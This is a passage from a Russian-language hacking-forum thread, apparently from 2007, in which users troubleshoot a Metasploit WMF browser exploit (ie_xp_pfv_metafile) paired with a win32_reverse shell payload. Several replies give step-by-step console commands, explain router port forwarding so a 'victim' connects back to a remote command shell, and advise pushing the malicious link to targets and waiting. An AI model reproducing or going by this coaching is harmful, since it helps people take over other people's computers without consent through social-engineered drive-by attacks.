Авторские статьи Metasploit Framework для ламеров

Discussion in 'Статьи' started by -=lebed=-, 11 Jul 2006.

?
  1. Да, пользуюсь и доволен.

    51.2%
  2. Нет, он меня не устраивает, не нужен и т. п.

    14.8%
  3. А что это?

    34.0%
  1. Озя

    Озя Elder - Старейшина

    Joined:
    16 Aug 2007
    Messages:
    40
    Likes Received:
    7
    Reputations:
    0
    блин непонимаю... квипом посмотрел что у мну айпи и внешний и внутренний одинаковы...
    (в статье написанно что надо для того что б по инету а не по сети айпи не внутренний а внешний ставить)
    поставил а ничего не происходит.... человеку пишет ошибку а мну вообще нешиветится))) подскажите пожалуйста!
    :rolleyes:
     
  2. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    Для начала попроси кого-нибудь из интернета пингануть твой IP.

    ЗЫ "нешиветится" - это на каком языке и какого значение слова?
     
  3. Пьяный Монах

    Joined:
    27 Jan 2007
    Messages:
    3
    Likes Received:
    1
    Reputations:
    0
    ламерский вопросец:
    если тело подключаеться по ссылке и мне пишет
    то эт значит что у него нет дыры ИЕ или я что т не то делаю?
     
  4. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    ДА, скорее всего варианты а), б), в) и г) из поста №83
     
    #84 -=lebed=-, 1 Oct 2007
    Last edited: 1 Oct 2007
  5. tr1z0n

    tr1z0n Редиска

    Joined:
    13 Jan 2007
    Messages:
    44
    Likes Received:
    34
    Reputations:
    19
    а) редирект происходит, если порт уже чем то занят, вот и идёт перебор по всем попорядку...
    б) порты закрыты фаером или используется NAT.
    в) сплоит не пробивает систему (браузер)=пропатчена.
    г) бажная dll не подгружается, так как вредоносный tiff-файл обрабатывается другой dll (Например установлен ACDSee) и шеллкод (реверсшелл) не получает управления.

    Эти пункты подходят к моему случаю??: (тестирую на компах в локалке)

    У меня MFW 2.7 запускаю из него ie_xp_pfv_metafile...начиняю, запускаю (на моей машине XP SP2 месяц назад установленная)....на другом компе пишу в ИЕ ip:8080 (винда такая же ).

    Вот что пишет MWF:
    Waiting for connections to http://ip/
    HTTP Client connected from xxxxxxxxx, redirecting...
    HTTP Client connected from xxxxxxxxx, redirecting...
    HTTP Client connected from xxxxxxxxx, sending 1304 bytes of payload...

    и всё! дальше ничего не происходит...на другом конце только one second please....
    ..интернет идёт через сервер с файрволом и антивирусом ...LHOST прописан как IP моей машины....и ещё...что это за картинка wmf?

    дома эксперементирую....на другом компе, в ИЕ - сохранить картинку, да сохранить...
    framework показывает тоже самое...
     
    #85 tr1z0n, 4 Oct 2007
    Last edited: 4 Oct 2007
  6. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    sending 1304 bytes of payload - отправлена начинка, т.е. WMF-файл (он и содержит сплоит+начинку) отправляется на машину (кстати его может убить антивирь). Далее этот файл должен открытся в стандартном просмотрщике рисунков и факсов, если этого не произойдёт - то сплоит не сработает. Так же должно быть разрешено в браузере активное содержимое!.

    ЗЫ Ещё попробуй на компе-жертве посмотреть в стандартном проводнике превьюшку того загруженного WMF-файла (или Tiff, какое конкретно расширение там будет - уже не помню - без разницы) или его свойства - сплоит так же должен сработать в этом случае...

    Там дыра не в самом IE- он используется лишь для загрузки вредоносного WMF-файла, а в системной dll
     
    #86 -=lebed=-, 4 Oct 2007
    Last edited: 4 Oct 2007
  7. Romk

    Romk New Member

    Joined:
    11 Oct 2007
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Помогите

    ПОмогите понять... всё делаю как написано,получается законектится и соедетнися,но после этого он выводи сообшение что то типа Мозила 4.0_и в скобках какое ядро и ещё что то)
    и всё,не какой командной страки... помоги понять почему так?
    уверен что на том компе даже антивирус не стоит :rolleyes:
    Ответ: Сплоит под IE! (Жертва должна ослом зайти)
     
    #87 Romk, 11 Oct 2007
    Last edited by a moderator: 12 Oct 2007
  8. Romk

    Romk New Member

    Joined:
    11 Oct 2007
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    ну так она и говорит что задоит под IE :(
     
  9. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    Скинь сюда полный лог консоли Метасплоита.
     
  10. Praetorian666

    Praetorian666 Member

    Joined:
    20 Oct 2007
    Messages:
    19
    Likes Received:
    5
    Reputations:
    0
    ->Хорошая статья но новичкам будет удобнее пользоватся веб инерфейсом там все наглядней.
    надо запустит nsfweb и в браузере набрать
    127.0.0.1 :55555.

    Не нужно ничего набирать.Веб-интерфейс запускается вместе с консольной версией,после запуска файла "metasploit 3".Или это только в третьей версии...

    ->Угу, там консоль эмулируется через web-интерфейс...

    Разве?Вроде через консоль тоже можно.Там и веб и консоль есть.
    Выбираешь,что удобнее).
     
    #90 Praetorian666, 26 Oct 2007
    Last edited: 26 Oct 2007
  11. _JD_

    _JD_ Guest

    Reputations:
    0
    кароч .я тут еще новенький, и с екс... розбераюсь ток пока. кароч гружу я msfconsole 2.7, и выбивает вот че "[*] Starting the Metasploit Framework...

    -JD-@p ~
    $"
    че делать-то дальше...? помогите с вопросом, и если мона, еще чуть инфо для новичка), что может помочь...
     
  12. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    Устанавливай Metasploit 3.0 и не парься с 2.7
     
  13. *D1VER

    *D1VER Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    108
    Likes Received:
    67
    Reputations:
    21
    Romk, мои эксперименты с ФРЭЙМВОРКОМ 2.7 версии показали что совсем необязательно жертве заходить именно с Осла. если используется ie_pfv_xp_metafile с начинкой win32_reverse, само название эксплойта говорит о том что должна использоваться программа-просмотрщик изображений и факсов установленная по умолчанию в
    Винде.
     
  14. Ledi

    Ledi Guest

    Reputations:
    0
    Доброго времени суток! подскажите советом, будет ли программа Metasploit Framework работать с эксплойтами, которые я сама написала, можно ли их туда встроить?
    - Можно, в версии 2.7 Эксплоиты писались на Perl, в 3.0 версии уже на Ruby. Вся инфу (на английском) можно найти на metasploit.com.
    :confused: Извините. просто у меня диплом связан с этой программой и мне бы хотелось подробнее узнать как имея в наличии эксплоит на языке Ruby поместить его в это программку, чтобы потом воспользоваться этим эксплойтом.....
    - попробуй скопировать в папку Metasploit\Framework3\framework\modules\exploits\соответсвующий_раздел
     
    #94 Ledi, 20 Nov 2007
    Last edited by a moderator: 26 Nov 2007
  15. Ksif

    Ksif New Member

    Joined:
    12 Dec 2007
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    Хм...такой вопрос:
    У меня локальная сеть (тоесть и-нет через шнур, оптика), лично мой ip (например) 15.15.15.15.
    А внешний ip (который общий на всю локалку, тоесть все компьютеры входят во внешку и находятся там именно под одним общим для всех внешним ip) 155.155.155.155
    Так какой ip вводить в LHOST: локальный (15.15.15.15) или внешний (155.155.155.155)?
    Кстати, для того, что бы эксплойт запустился, нужно иметь сервер или он сам свой создаёт? И ещё: под какую версию IE этот эксплойт?
    Заранее благодарен.
     
  16. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    LHOST - для сплоита это будет всегда localhost, т. е внутренний IP, Метасплоит сам создаёт web-сервер, чтоб предоставить вредоносную html-страницу. А вот LHOST для начинки реверс-шелл это уже внешний IP, но с него должна быть настроена переадресация в таблице NAT роутера, чтоб жертва могла приконнектится к твоему компу в локалке и установить пайп с cmd удалённого компа-жертвы...

    WMF-сплоит под XP SP2 (бага в системной dll) а html-код заточен под IE<=6.
     
  17. Ksif

    Ksif New Member

    Joined:
    12 Dec 2007
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    Тоесть должно выглядеть так:
    Code:
    > use ie_xp_pfv_metafile
    > set LHOST (локальный ip)
    > set PAYLOAD win32_reverse
    > set LHOST (внешний ip)
    
    Я правильно понял?
    Кстати, не подскажешь, как настроить переадресацию в таблице NAT роутера и не скажется ли это на моей безопасности?
    (модель роутера: D-Link DI-524)
     
  18. Flame of Soul

    Flame of Soul Elder - Старейшина

    Joined:
    25 May 2007
    Messages:
    185
    Likes Received:
    146
    Reputations:
    45
    Ksif

    msf > use ie_xp_pfv_metafile
    msf ie_xp_pfv_metafile > set LHOST 10.0.0.1 (тут ай-пи твоей тачки)
    LHOST -> 10.0.0.1 (это у тебя вылезти должно, в смысле в консоли )


    msf ie_xp_pfv_metafile > set PAYLOAD win32_reverse (это ты вбиваешь начинку)
    PAYLOAD -> win32_reverse (сообщение проги о том что начинка принята)
    msf ie_xp_pfv_metafile(win32_reverse) >msf ie_xp_pfv_metafile(win32_reverse) > exploit (это ты вводишь как старт для начала поднятия сервера с вредоносным кодом)

    [*] Starting Reverse Handler.
    [*] Waiting for connections to http://10.0.0.1:8080/

    (эти две строки говорят о том что сервак поднят) после этого впариваешь кому тебе надо ссылку на свой комп и ждешь. Самое главное чтобы там стоял стандартный просмоторщик файлов, есив асидиси иль что нибудь другое не проканает

    PS: статья написана для детского сада, в том смысле что там так все разжеванно что я удивлена что столько много вопросов возникает...
     
    #98 Flame of Soul, 13 Dec 2007
    Last edited: 13 Dec 2007
  19. Ksif

    Ksif New Member

    Joined:
    12 Dec 2007
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    А это внештатные ситуации :)
    Просто ерунда то вот в чём:
    LHOST я задаю свой локальный IP.
    Но когда запускаю exploit, то выходит вот что:
    Code:
    [*] Starting Reverse Handler.
    [*] Waiting for connections to [B]http://Внешний IP:8080, не локальный!/[/B]
    
    Тоесть сервер он ставит на общий внешний IP.
    Протестил сам на себе ( сам прошёл по адресу - внешнему IP ), переходится на какой то неоткрываемый tiff-файл. При этом в эксплойте написано:
    Code:
    [*] HTTP Client Connected from Внешний IP: 1780, redirecting...
    [*] HTTP Client Connected from Внешний IP: 1782, sending 1456 bytes of payload...
    
     
  20. Flame of Soul

    Flame of Soul Elder - Старейшина

    Joined:
    25 May 2007
    Messages:
    185
    Likes Received:
    146
    Reputations:
    45
    там если мне не изменяет память wmf файл, у тя просмоторщик стандартный?
    у тя начинка не полностью уходит, с серваком по моему мнению все в парядке, дело в твоей системе. У тя точно на асиди си или неро не стоит(граф просмоторщик по умолчанию для wmf)?